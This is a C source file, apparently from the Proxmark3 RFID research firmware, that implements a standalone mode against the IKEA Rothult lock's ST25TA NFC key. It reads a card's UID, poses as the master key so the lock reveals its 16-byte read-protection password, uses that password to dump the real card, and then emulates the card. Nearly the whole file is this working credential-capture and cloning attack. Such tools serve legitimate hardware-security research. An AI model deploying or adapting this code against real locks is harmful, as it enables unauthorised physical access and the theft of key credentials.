mirror of
https://github.com/RfidResearchGroup/proxmark3.git
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492 lines
22 KiB
C
492 lines
22 KiB
C
//-----------------------------------------------------------------------------
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// Copyright (C) Nick Draffen, 2020
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// Copyright (C) Proxmark3 contributors. See AUTHORS.md for details.
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//
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// This program is free software: you can redistribute it and/or modify
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// it under the terms of the GNU General Public License as published by
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// the Free Software Foundation, either version 3 of the License, or
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// (at your option) any later version.
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//
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// This program is distributed in the hope that it will be useful,
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// but WITHOUT ANY WARRANTY; without even the implied warranty of
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// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
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// GNU General Public License for more details.
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//
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// See LICENSE.txt for the text of the license.
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//-----------------------------------------------------------------------------
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// code for HF ST25TA IKEA Rothult read/sim/dump/emulation by Nick Draffen
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//-----------------------------------------------------------------------------
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#include "standalone.h"
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#include "proxmark3_arm.h"
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#include "appmain.h"
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#include "fpgaloader.h"
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#include "util.h"
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#include "dbprint.h"
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#include "ticks.h"
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#include "string.h"
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#include "BigBuf.h"
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#include "iso14443a.h"
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#include "protocols.h"
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#include "cmd.h"
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void ModInfo(void) {
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DbpString(" HF - IKEA Rothult ST25TA, Standalone Master Key Dump/Emulation (ISO14443) - (Nick Draffen)");
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}
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/* This standalone implements four different modes: reading, simulating, dumping, & emulating.
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*
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* The initial mode is reading with LEDs A & D.
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* In this mode, the Proxmark is looking for an ST25TA card like those used by the IKEA Rothult,
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* it will act as reader, and store the UID for simulation.
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*
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* If the Proxmark gets an ST25TA UID, it will change to simulation mode (LEDs A & C) automatically.
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* During this mode the Proxmark will pretend to be the IKEA Rothult ST25TA master key, upon presentation
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* to an IKEA Rothult the Proxmark will steal the 16 byte Read Protection key used to authenticate to the card.
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*
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* Once it gets the key, it will switch to dump mode (LEDs C & D) automatically. During this mode the Proxmark
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* will act as a reader once again, but now we know the Read Protection key to authenticate to the card to dump
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* it's contents so we can achieve full emulation.
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*
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* Once it dumps the contents of the card, it will switch to emulation mode (LED C) automatically.
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* During this mode the Proxmark should function as the original ST25TA IKEA Rothult Master Key
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*
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* Keep pressing the button down will quit the standalone cycle.
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*
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* LEDs:
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* LED A & D = in reading mode
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* LED A & C = in simulation mode, to steal Read Protection key
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* LED C & D = in dump mode, to authenticate to card and dump NDEF content
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* LED C = in emulation mode
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* LED B = receiving/sending commands, activity
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*
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* Thanks to Salvador Mendoza for which this standalone mode is based off
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* Thanks to iceman for his assistance on the ST25TA research
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*/
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void RunMod(void) {
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StandAloneMode();
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DbpString(_YELLOW_(">>") "IKEA Rothult ST25TA Standalone (tcprst) Started " _YELLOW_("<<"));
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FpgaDownloadAndGo(FPGA_BITSTREAM_HF);
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uint8_t stuid[7] = {0x00};
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//For reading process
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iso14a_card_select_t card_a_info;
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uint8_t apdubuffer[MAX_FRAME_SIZE] = { 0x00 };
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// APDUs necessary to dump NDEF
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// ----------------------------
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// Select NDEF Application
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uint8_t ndef_app[13] = {0x00, 0xa4, 0x04, 0x00, 0x07, 0xd2, 0x76, 0x00, 0x00, 0x85, 0x01, 0x01, 0x00};
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// Select NDEF File
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uint8_t ndef_sel[7] = {0x00, 0xa4, 0x00, 0x0c, 0x02, 0x00, 0x01};
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// Read verification without password
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uint8_t verify[5] = {0x00, 0x20, 0x00, 0x01, 0x00};
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// Read verification with password
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uint8_t verify_pwd[21] = {0x00, 0x20, 0x00, 0x01, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00};
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// Read NDEF file contents
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uint8_t ndef_read[5] = {0x00, 0xb0, 0x00, 0x00, 0x1d};
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uint8_t *apdus[5] = {ndef_app, ndef_sel, verify, verify_pwd, ndef_read};
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uint8_t apdusLen [5] = { sizeof(ndef_app), sizeof(ndef_sel), sizeof(verify), sizeof(verify_pwd), sizeof(ndef_read)};
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// NDEF file contents
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uint8_t ndef[31] = {0x00, 0x1b, 0xd1, 0x01, 0x17, 0x54, 0x02, 0x7a, 0x68, 0xa2, 0x34, 0xcb, 0xd0, 0xe2, 0x03, 0xc7, 0x3e, 0x62, 0x0b, 0xe8, 0xc6, 0x3c, 0x85, 0x2c, 0xc5, 0x31, 0x31, 0x31, 0x32, 0x90, 0x00};
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uint8_t ndef_len = 31;
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// Did we get the read protection key from the Rothult
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bool gotkey = false;
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// Did we get the NDEF file contents from the card
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bool gotndef = false;
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//ST25TA Rothult values
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#define SAK 0x20
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#define ATQA0 0x42
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#define ATQA1 0x00
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// Allocate 512 bytes for the dynamic modulation, created when the reader queries for it
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// Such a response is less time critical, so we can prepare them on the fly
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#define DYNAMIC_RESPONSE_BUFFER_SIZE 64
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#define DYNAMIC_MODULATION_BUFFER_SIZE 512
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uint8_t flags = FLAG_7B_UID_IN_DATA; // ST25TA have 7B UID
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uint8_t data[PM3_CMD_DATA_SIZE] = {0x00}; // in case there is a read command received we shouldn't break
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// to initialize the emulation
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uint8_t tagType = 10; // 10 = ST25TA IKEA Rothult
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tag_response_info_t *responses;
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uint32_t cuid = 0;
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uint32_t counters[3] = { 0x00, 0x00, 0x00 };
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uint8_t tearings[3] = { 0xbd, 0xbd, 0xbd };
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uint8_t pages = 0;
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// command buffers
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uint8_t receivedCmd[MAX_FRAME_SIZE] = { 0x00 };
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uint8_t receivedCmdPar[MAX_PARITY_SIZE] = { 0x00 };
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uint8_t dynamic_response_buffer[DYNAMIC_RESPONSE_BUFFER_SIZE] = {0};
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uint8_t dynamic_modulation_buffer[DYNAMIC_MODULATION_BUFFER_SIZE] = {0};
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// handler - command responses
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tag_response_info_t dynamic_response_info = {
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.response = dynamic_response_buffer,
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.response_n = 0,
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.modulation = dynamic_modulation_buffer,
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.modulation_n = 0
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};
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// States for standalone
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#define STATE_READ 0
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#define STATE_SIM 1
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#define STATE_DUMP 2
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#define STATE_EMUL 3
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uint8_t state = STATE_READ;
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DbpString(_YELLOW_("[ ") "Initialized reading mode" _YELLOW_(" ]"));
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DbpString("\n"_YELLOW_("!!") "Waiting for an IKEA ST25TA card...");
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for (;;) {
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WDT_HIT();
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// exit from RunMod, send a usbcommand.
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if (data_available()) break;
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// Was our button held down or pressed?
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int button_pressed = BUTTON_HELD(1000);
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if (button_pressed == BUTTON_HOLD) { //Holding down the button
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break;
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}
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SpinDelay(500);
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if (state == STATE_READ) {
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LED_D_ON();
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LED_A_ON();
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// Get UID of ST25TA Card to simulate
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iso14443a_setup(FPGA_HF_ISO14443A_READER_MOD);
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if (iso14443a_select_card(NULL, &card_a_info, NULL, true, 0, false)) {
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DbpString(_YELLOW_("+") "Found ISO 14443 Type A!");
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if (card_a_info.sak == SAK && card_a_info.atqa[0] == ATQA0 && card_a_info.atqa[1] == ATQA1 && card_a_info.uidlen == 7) {
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DbpString(_YELLOW_("+") "Found ST25TA with UID: ");
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Dbhexdump(card_a_info.uidlen, card_a_info.uid, 0);
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memcpy(stuid, card_a_info.uid, card_a_info.uidlen);
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state = STATE_SIM;
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} else {
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DbpString("Found non-ST25TA card, ignoring.");
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}
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}
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FpgaWriteConfWord(FPGA_MAJOR_MODE_OFF);
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} else if (state == STATE_SIM) {
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LED_C_ON();
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//Simulate tag to get PWD
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// free eventually allocated BigBuf memory but keep Emulator Memory
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BigBuf_free_keep_EM();
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memcpy(data, stuid, sizeof(stuid));
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if (SimulateIso14443aInit(tagType, flags, data, &responses, &cuid, counters, tearings, &pages) == false) {
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BigBuf_free_keep_EM();
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reply_ng(CMD_HF_MIFARE_SIMULATE, PM3_EINIT, NULL, 0);
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DbpString(_YELLOW_("!!") "Error initializing the simulation process!");
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SpinDelay(500);
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state = STATE_READ;
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DbpString(_YELLOW_("[ ") "Initialized reading mode" _YELLOW_(" ]"));
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DbpString("\n" _YELLOW_("!!") "Waiting for an ST25TA card...");
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continue;
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}
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// We need to listen to the high-frequency, peak-detected path.
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iso14443a_setup(FPGA_HF_ISO14443A_TAGSIM_LISTEN);
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int len = 0; // command length
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int retval = PM3_SUCCESS; // to check emulation status
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bool odd_reply = true;
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clear_trace();
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set_tracing(true);
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while (!gotkey) {
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LED_B_OFF();
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// Clean receive command buffer
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if (!GetIso14443aCommandFromReader(receivedCmd, receivedCmdPar, &len)) {
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DbpString(_YELLOW_("!!") "Emulator stopped");
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retval = PM3_EOPABORTED;
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break;
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}
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tag_response_info_t *p_response = NULL;
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LED_B_ON();
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// dynamic_response_info will be in charge of responses
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dynamic_response_info.response_n = 0;
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// Checking the commands order is important and elemental
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if (receivedCmd[0] == ISO14443A_CMD_REQA && len == 1) { // Received a REQUEST
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odd_reply = !odd_reply;
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if (odd_reply)
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p_response = &responses[RESP_INDEX_ATQA];
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} else if (receivedCmd[0] == ISO14443A_CMD_HALT && len == 4) { // Received a HALT
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p_response = NULL;
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} else if (receivedCmd[0] == ISO14443A_CMD_WUPA && len == 1) { // Received a WAKEUP
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p_response = &responses[RESP_INDEX_ATQA];
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} else if (receivedCmd[1] == 0x20 && receivedCmd[0] == ISO14443A_CMD_ANTICOLL_OR_SELECT && len == 2) { // Received request for UID (cascade 1)
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p_response = &responses[RESP_INDEX_UIDC1];
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} else if (receivedCmd[1] == 0x20 && receivedCmd[0] == ISO14443A_CMD_ANTICOLL_OR_SELECT_2 && len == 2) { // Received request for UID (cascade 2)
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p_response = &responses[RESP_INDEX_UIDC2];
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} else if (receivedCmd[1] == 0x70 && receivedCmd[0] == ISO14443A_CMD_ANTICOLL_OR_SELECT && len == 9) { // Received a SELECT (cascade 1)
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p_response = &responses[RESP_INDEX_SAKC1];
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} else if (receivedCmd[1] == 0x70 && receivedCmd[0] == ISO14443A_CMD_ANTICOLL_OR_SELECT_2 && len == 9) { // Received a SELECT (cascade 2)
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p_response = &responses[RESP_INDEX_SAKC2];
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} else if (receivedCmd[0] == ISO14443A_CMD_RATS && len == 4) { // Received a RATS request
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p_response = &responses[RESP_INDEX_RATS];
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} else if (receivedCmd[0] == ISO14443A_CMD_PPS) {
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p_response = &responses[RESP_INDEX_PPS];
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} else {
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DbpString(_YELLOW_("[ ") "Card reader command" _YELLOW_(" ]"));
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Dbhexdump(len, receivedCmd, false);
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if (receivedCmd[0] == 0x02 || receivedCmd[0] == 0x03) { //Emulate an ST25TA IKEA Rothult Master Key
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dynamic_response_info.response[0] = receivedCmd[0];
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if (memcmp("\x02\xa2\xb0\x00\x00\x1d\x51\x69", receivedCmd, 8) == 0) {
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memcpy(dynamic_response_info.response + 1, ndef, 31);
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dynamic_response_info.response_n = 32;
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} else if (memcmp("\x02\x00\x20\x00\x01\x00\x6e\xa9", receivedCmd, 8) == 0) {
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dynamic_response_info.response[1] = 0x63;
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dynamic_response_info.response[2] = 0x00;
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dynamic_response_info.response_n = 3;
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} else if (memcmp("\x03\x00\x20\x00\x01\x10", receivedCmd, 6) == 0) {
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memcpy(verify_pwd + 5, receivedCmd + 6, 16);
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DbpString("Reader sent password: ");
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Dbhexdump(16, verify_pwd + 5, 0);
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dynamic_response_info.response[1] = 0x90;
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dynamic_response_info.response[2] = 0x00;
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dynamic_response_info.response_n = 3;
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gotkey = true;
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state = STATE_DUMP;
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} else {
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dynamic_response_info.response[1] = 0x90;
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dynamic_response_info.response[2] = 0x00;
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dynamic_response_info.response_n = 3;
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}
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} else {
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DbpString(_YELLOW_("!!") "Received unknown command!");
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memcpy(dynamic_response_info.response, receivedCmd, len);
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dynamic_response_info.response_n = len;
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}
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}
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if (dynamic_response_info.response_n > 0) {
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DbpString(_GREEN_("[ ") "Proxmark3 answer" _GREEN_(" ]"));
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Dbhexdump(dynamic_response_info.response_n, dynamic_response_info.response, false);
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DbpString("----");
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// Add CRC bytes, always used in ISO 14443A-4 compliant cards
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AddCrc14A(dynamic_response_info.response, dynamic_response_info.response_n);
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dynamic_response_info.response_n += 2;
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if (prepare_tag_modulation(&dynamic_response_info, DYNAMIC_MODULATION_BUFFER_SIZE) == false) {
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SpinDelay(500);
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DbpString(_YELLOW_("!!") "Error preparing Proxmark to answer!");
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continue;
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}
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p_response = &dynamic_response_info;
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}
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if (p_response != NULL) {
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EmSendPrecompiledCmd(p_response);
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}
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}
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switch_off();
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set_tracing(false);
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BigBuf_free_keep_EM();
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reply_ng(CMD_HF_MIFARE_SIMULATE, retval, NULL, 0);
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} else if (state == STATE_DUMP) {
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LED_A_OFF();
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LED_C_ON();
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LED_D_ON();
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iso14443a_setup(FPGA_HF_ISO14443A_READER_MOD);
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if (iso14443a_select_card(NULL, &card_a_info, NULL, true, 0, false)) {
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DbpString(_YELLOW_("+") "Found ISO 14443 Type A!");
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for (uint8_t i = 0; i < 5; i++) {
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gotndef = false;
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LED_B_ON();
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uint8_t apdulen = iso14_apdu(apdus[i], (uint16_t) apdusLen[i], false, apdubuffer, NULL);
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if (apdulen > 2) {
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DbpString(_YELLOW_("[ ") "Proxmark command" _YELLOW_(" ]"));
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Dbhexdump(apdusLen[i], apdus[i], false);
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DbpString(_GREEN_("[ ") "Card answer" _GREEN_(" ]"));
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Dbhexdump(apdulen - 2, apdubuffer, false);
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DbpString("----");
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if (i == 4) {
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// Get NDEF Data
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if (apdubuffer[1] == 0x1b && apdubuffer[2] == 0xd1) {
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gotndef = true;
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memcpy(&ndef, &apdubuffer, apdulen - 2);
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break;
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}
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}
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} else {
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DbpString(_YELLOW_("!!") "Error reading the card");
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}
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LED_B_OFF();
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}
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if (gotndef) {
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DbpString(_RED_("[ ") "NDEF File" _RED_(" ]"));
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Dbhexdump(ndef_len, (uint8_t *)ndef, false);
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DbpString("---");
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LED_C_ON();
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state = STATE_EMUL;
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DbpString(_YELLOW_("[ ") "Initialized emulation mode" _YELLOW_(" ]"));
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DbpString("\n"_YELLOW_("!!") "Waiting for a card reader...");
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}
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}
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FpgaWriteConfWord(FPGA_MAJOR_MODE_OFF);
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} else if (state == STATE_EMUL) {
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LED_D_OFF();
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LED_C_ON();
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// free eventually allocated BigBuf memory but keep Emulator Memory
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BigBuf_free_keep_EM();
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memcpy(data, stuid, sizeof(stuid));
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if (SimulateIso14443aInit(tagType, flags, data, &responses, &cuid, counters, tearings, &pages) == false) {
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BigBuf_free_keep_EM();
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reply_ng(CMD_HF_MIFARE_SIMULATE, PM3_EINIT, NULL, 0);
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DbpString(_YELLOW_("!!") "Error initializing the simulation process!");
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SpinDelay(500);
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state = STATE_READ;
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DbpString(_YELLOW_("[ ") "Initialized reading mode" _YELLOW_(" ]"));
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DbpString("\n" _YELLOW_("!!") "Waiting for an ST25TA card...");
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continue;
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}
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// We need to listen to the high-frequency, peak-detected path.
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iso14443a_setup(FPGA_HF_ISO14443A_TAGSIM_LISTEN);
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int len = 0; // command length
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int retval = PM3_SUCCESS; // to check emulation status
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bool odd_reply = true;
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clear_trace();
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set_tracing(true);
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for (;;) {
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LED_B_OFF();
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// Clean receive command buffer
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if (!GetIso14443aCommandFromReader(receivedCmd, receivedCmdPar, &len)) {
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DbpString(_YELLOW_("!!") "Emulator stopped");
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retval = PM3_EOPABORTED;
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break;
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}
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tag_response_info_t *p_response = NULL;
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LED_B_ON();
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// dynamic_response_info will be in charge of responses
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dynamic_response_info.response_n = 0;
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// Checking the commands order is important and elemental
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if (receivedCmd[0] == ISO14443A_CMD_REQA && len == 1) { // Received a REQUEST
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odd_reply = !odd_reply;
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if (odd_reply)
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p_response = &responses[RESP_INDEX_ATQA];
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} else if (receivedCmd[0] == ISO14443A_CMD_HALT && len == 4) { // Received a HALT
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p_response = NULL;
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} else if (receivedCmd[0] == ISO14443A_CMD_WUPA && len == 1) { // Received a WAKEUP
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p_response = &responses[RESP_INDEX_ATQA];
|
|
} else if (receivedCmd[1] == 0x20 && receivedCmd[0] == ISO14443A_CMD_ANTICOLL_OR_SELECT && len == 2) { // Received request for UID (cascade 1)
|
|
p_response = &responses[RESP_INDEX_UIDC1];
|
|
} else if (receivedCmd[1] == 0x20 && receivedCmd[0] == ISO14443A_CMD_ANTICOLL_OR_SELECT_2 && len == 2) { // Received request for UID (cascade 2)
|
|
p_response = &responses[RESP_INDEX_UIDC2];
|
|
} else if (receivedCmd[1] == 0x70 && receivedCmd[0] == ISO14443A_CMD_ANTICOLL_OR_SELECT && len == 9) { // Received a SELECT (cascade 1)
|
|
p_response = &responses[RESP_INDEX_SAKC1];
|
|
} else if (receivedCmd[1] == 0x70 && receivedCmd[0] == ISO14443A_CMD_ANTICOLL_OR_SELECT_2 && len == 9) { // Received a SELECT (cascade 2)
|
|
p_response = &responses[RESP_INDEX_SAKC2];
|
|
} else if (receivedCmd[0] == ISO14443A_CMD_RATS && len == 4) { // Received a RATS request
|
|
p_response = &responses[RESP_INDEX_RATS];
|
|
} else if (receivedCmd[0] == ISO14443A_CMD_PPS) {
|
|
p_response = &responses[RESP_INDEX_PPS];
|
|
} else {
|
|
DbpString(_YELLOW_("[ ") "Card reader command" _YELLOW_(" ]"));
|
|
Dbhexdump(len, receivedCmd, false);
|
|
|
|
if (receivedCmd[0] == 0x02 || receivedCmd[0] == 0x03) { //Emulate an ST25TA IKEA Rothult Master Key
|
|
dynamic_response_info.response[0] = receivedCmd[0];
|
|
|
|
if (memcmp("\x02\xa2\xb0\x00\x00\x1d\x51\x69", receivedCmd, 8) == 0) {
|
|
memcpy(dynamic_response_info.response + 1, ndef, 31);
|
|
dynamic_response_info.response_n = 32;
|
|
} else if (memcmp("\x02\x00\x20\x00\x01\x00\x6e\xa9", receivedCmd, 8) == 0) {
|
|
dynamic_response_info.response[1] = 0x63;
|
|
dynamic_response_info.response[2] = 0x00;
|
|
dynamic_response_info.response_n = 3;
|
|
} else if (memcmp("\x03\x00\x20\x00\x01\x10", receivedCmd, 6) == 0) {
|
|
memcpy(verify_pwd + 5, receivedCmd + 6, 16);
|
|
DbpString("Reader sent password: ");
|
|
Dbhexdump(16, verify_pwd + 5, 0);
|
|
dynamic_response_info.response[1] = 0x90;
|
|
dynamic_response_info.response[2] = 0x00;
|
|
dynamic_response_info.response_n = 3;
|
|
} else {
|
|
dynamic_response_info.response[1] = 0x90;
|
|
dynamic_response_info.response[2] = 0x00;
|
|
dynamic_response_info.response_n = 3;
|
|
}
|
|
} else {
|
|
DbpString(_YELLOW_("!!") "Received unknown command!");
|
|
memcpy(dynamic_response_info.response, receivedCmd, len);
|
|
dynamic_response_info.response_n = len;
|
|
}
|
|
}
|
|
if (dynamic_response_info.response_n > 0) {
|
|
DbpString(_GREEN_("[ ") "Proxmark3 answer" _GREEN_(" ]"));
|
|
Dbhexdump(dynamic_response_info.response_n, dynamic_response_info.response, false);
|
|
DbpString("----");
|
|
|
|
// Add CRC bytes, always used in ISO 14443A-4 compliant cards
|
|
AddCrc14A(dynamic_response_info.response, dynamic_response_info.response_n);
|
|
dynamic_response_info.response_n += 2;
|
|
|
|
if (prepare_tag_modulation(&dynamic_response_info, DYNAMIC_MODULATION_BUFFER_SIZE) == false) {
|
|
SpinDelay(500);
|
|
DbpString(_YELLOW_("!!") "Error preparing Proxmark to answer!");
|
|
continue;
|
|
}
|
|
p_response = &dynamic_response_info;
|
|
}
|
|
|
|
if (p_response != NULL) {
|
|
EmSendPrecompiledCmd(p_response);
|
|
}
|
|
}
|
|
switch_off();
|
|
|
|
set_tracing(false);
|
|
BigBuf_free_keep_EM();
|
|
reply_ng(CMD_HF_MIFARE_SIMULATE, retval, NULL, 0);
|
|
}
|
|
}
|
|
DbpString(_YELLOW_("[=]") "exiting");
|
|
LEDsoff();
|
|
}
|